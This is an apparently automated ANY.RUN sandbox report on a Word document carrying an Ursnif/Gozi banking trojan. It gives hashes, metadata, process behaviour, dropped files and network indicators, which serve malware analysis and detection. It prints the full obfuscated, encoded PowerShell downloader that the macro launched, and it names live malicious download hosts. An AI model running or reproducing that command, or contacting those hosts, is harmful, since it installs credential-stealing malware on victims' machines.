analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

c4d85f171489dc5a20febf0267eeb5e8bb09acfaf8259dd397daeec8613d8320_info_17.07.doc

Full analysis: https://app.any.run/tasks/300694a6-8318-493a-b701-778c5a48ba34
Verdict: Malicious activity
Threats:

Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world.

Analysis date: July 17, 2019, 07:04:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
gozi
ursnif
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: ybwnihghdkvomuadyvxgafkhpj, Subject: fjppfoggmoykz, Comments: mkrjf, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 25 22:21:00 2018, Last Saved Time/Date: Tue Jul 16 21:29:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

5D1FEED7B94AA75AA0497BA1CE8E094F

SHA1:

9DED71B95F928668A134AB16287A25C29BCE4DBA

SHA256:

C4D85F171489DC5A20FEBF0267EEB5E8BB09ACFAF8259DD397DAEEC8613D8320

SSDEEP:

1536:F6nw7OVrWBC1gHxmTs3sLcYRkrXX4HJqyjK0K:wOCnTscLcY64HJqkK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2952)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2952)
    • URSNIF was detected

      • powershell.exe (PID: 2208)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2208)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2952)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2952)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: ybwnihghdkvomuadyvxgafkhpj
Subject: fjppfoggmoykz
Author: -
Keywords: -
Comments: mkrjf
Template: Normal
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:04:25 21:21:00
ModifyDate: 2019:07:16 20:29:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Cyrillic
Manager: -
Company: -
Bytes: 22528
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • ybwnihghdkvomuadyvxgafkhpj
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
2
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs #URSNIF powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2952"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\c4d85f171489dc5a20febf0267eeb5e8bb09acfaf8259dd397daeec8613d8320_info_17.07.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2208"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcAVABaAEQAZABhADgASQB3AEYATQBYAGYAQgAvAHMAZgA4AHQAQwBSAEYAbQBkAEsAbgBjAE8AUABVAHMAYQB3AEkAbQBWAFMAeABRADgANgA5AGcASABHAG0ATABiAFoAMABpAFoAcgBvAHIAVQBUAC8ALwBkADEAbwBHADQAdgA5ADcANgBjAGMAKwAvADUASABTAE8AbwBBAG8AbQBmADUAcwBBAEQAOABPAHQARgBqAFEAbAAwAGoAYQBVAHMAWgBSAFIANQBCAHMAMQAzAC8AYQAyAGkAaABTAHgARQB6AEQAaAB0AHcARABmAFkATQBFADcANgBCAGsAUgAwAFQAMgB1AHgAYQBNAGUAOQA1AGMAWgBEAEoAcwB4AGgAQQA5AEsAeQBLAGUAcQAxAC8AcQBCAEUAUQB3AHUARQBkAEwAVgBZAG8AWQBpAHUAVgA0AE0AeABvACsASABDAE4AWABiAGIAbQBUADkANQAvAEIANQA0AE0ATgBWAGEAOQBtADAANwBKAGoAaQByAE8ASwBkAHMAWABlAEMAVQBaAFUAZwBMAGEAYQB1AHEARgBIAGEAYwBDAEYARQBpAG0AYwBvAEgANwBtADMAMgBoAEcATwBsAE8AaQBqAFoAYwA0AGkAVQA1AEUAeQBiADgAQQBaAGEAYgBpAHcASwBpAGsAbABxAEcAcwBGAFUAWgB1ADIAUQBSAFkARABsADQAUABMAEUATwB1AGkAaQBPAHAAdwBpAEkAbAArAFUASQBSAGYAWQBqAHcATQArAC8ARABQAGMAZwBoAE8AdgA1AFEAWQB4AE0ATQAwAGEAWgBFAFIAMQBNADYAZwBwAE4ASwAxAEgAVgBtAE8AYwBGAFkAZwBQAHcANQBGAE8AUQBUAE8AaABvAE4AWAByAGQAQwB4AHcAZQBQAFUAWgBUAG4ASwBoAE4AQwBNAEsAVABRAHQAQgBxAEYATAB2AC8AZgA1ADgAZwBXAGYAYQB2AEYAeABlADEAeQBrAC8AMwBlAE8AUgBZAEUAMwBTAHcALwBIAG8AZwBtAEQANABiAFAANABMAGwAbwA4AG4AMgBKAC8AcgBJAHMAZwBUADgAOQB5AE0AMAA3ADEASABUAHUAOABPAE8AVwAwAEgAdABkAHAAZABPADEARwAvAGIAVQBEAEwAYwBxACsAdgBmAGcAQQA9ACcAKQAgACwAWwBzAFkAcwBUAGUAbQAuAGkAbwAuAGMATwBNAHAAUgBlAFMAcwBpAE8ATgAuAEMAbwBtAHAAcgBlAHMAcwBJAE8ATgBNAE8ARABFAF0AOgA6AEQARQBDAG8AbQBwAHIAZQBTAFMAIAApAHwAJgAoACcAZgAnACsAJwBvAHIAZQAnACsAJwBhAGMASAAnACkAewAgACYAKAAnAE4ARQBXAC0AbwBiACcAKwAnAEoAJwArACcARQBjAFQAJwApACAAIABpAGAAbwAuAGAAUwBgAFQAcgBlAGEAbQBSAEUAQQBEAEUAUgAoACQAXwAsAFsAcwB5AFMAVABlAG0ALgBUAEUAeABUAC4ARQBOAGMAbwBkAEkAbgBHAF0AOgA6AGEAcwBDAGkAaQApACAAfQB8AC4AKAAnAEYAbwByAEUAYQAnACsAJwBDACcAKwAnAEgAJwApAHsAJABfAC4AcgBlAGEAZAB0AG8AZQBuAGQAKAApACAAfQAgACkAIAB8AC4AKAAnAEkAJwArACcARQAnACAAKwAgACcAWAAnACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 389
Read events
926
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE85E.tmp.cvr
MD5:
SHA256:
2208powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PRLE0VDRIWP23WK4LJXX.temp
MD5:
SHA256:
2208powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF10f195.TMPbinary
MD5:4B92A079D7F4DFA0DFE9125E60FE7814
SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04
2208powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:4B92A079D7F4DFA0DFE9125E60FE7814
SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$d85f171489dc5a20febf0267eeb5e8bb09acfaf8259dd397daeec8613d8320_info_17.07.docpgc
MD5:94850A227C07C2F6FF43304184BC43EC
SHA256:A2D87BFE973D65DFDA13C8BA06E1EA706866F5282574314094522FA62CD5D175
2952WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1A7510C8EFCAFC695BBED85779C1D720
SHA256:7ED19829FBD183C339C395F1D4D5A0651BD0EEC9717640A21F0D1969D0D141A9
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:8CEE6A70B5F57D76FFD58D7E0817A814
SHA256:1D020B5205E32806FC1F570ABB40BF5B3345078CA5BC1099B49979C38C721DFE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2208
powershell.exe
GET
404
185.246.66.72:80
http://fcamylleibrahim.top/sywo/fgoow.php?l=dxclass7.gxl
unknown
malicious
2208
powershell.exe
GET
404
185.193.141.248:80
http://185.193.141.248/gs.php
RU
html
285 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2208
powershell.exe
185.246.66.72:80
fcamylleibrahim.top
suspicious
2208
powershell.exe
185.193.141.248:80
IT Mir LLC
RU
suspicious

DNS requests

Domain
IP
Reputation
fcamylleibrahim.top
  • 185.246.66.72
malicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
2208
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
1 ETPRO signatures available at the full report
No debug info